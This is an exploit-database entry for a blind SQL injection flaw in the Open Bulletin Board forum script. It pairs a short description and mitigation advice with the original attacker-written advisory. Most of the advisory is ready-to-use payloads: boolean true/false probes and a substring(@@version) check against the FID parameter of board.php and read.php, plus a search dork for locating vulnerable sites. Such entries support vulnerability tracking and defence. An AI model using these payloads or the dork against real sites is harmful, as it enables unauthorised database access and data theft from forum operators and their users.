header-logo
Suggest Exploit
vendor:
Open Bulletin Board
by:
AtT4CKxT3rR0r1ST
7,5
CVSS
HIGH
Blind Sql Injection
89
CWE
Product Name: Open Bulletin Board
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Open Bulletin Board Multiple Blind Sql Injection Vulnerability

The vulnerability exists in the Open Bulletin Board script, which allows an attacker to inject malicious SQL queries via the FID parameter in the board.php and read.php files. The attacker can use the true/false condition to check the validity of the query and extract information from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, parameterized queries should be used to prevent SQL injection.
Source

Exploit-DB raw data:

Open Bulletin Board Multiple Blind Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Open Bulletin Board
.:. Bug Type : Blind Sql Injection
.:. Dork : intitle:"Powered by Open Bulletin Board"

####################################################################

===[ Exploit ]===

www.site.com/board.php?FID=[Blind Injection]
www.site.com/read.php?FID=[Blind Injection]


www.site.com/board.php?FID=3+and+1=1 >>> True
www.site.com/board.php?FID=3+and+1=2 >>> False
www.site.com/board.php?FID=3+and+substring(@@version,1,1)=5 >>> True
www.site.com/board.php?FID=3+and+substring(@@version,1,1)=4 >>> False


www.site.com/read.php?FID=3+and+1=1 >>> True
www.site.com/read.php?FID=3+and+1=2 >>> False
www.site.com/read.php?FID=3+and+substring(@@version,1,1)=5 >>> True
www.site.com/read.php?FID=3+and+substring(@@version,1,1)=4 >>> False

####################################################################

Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack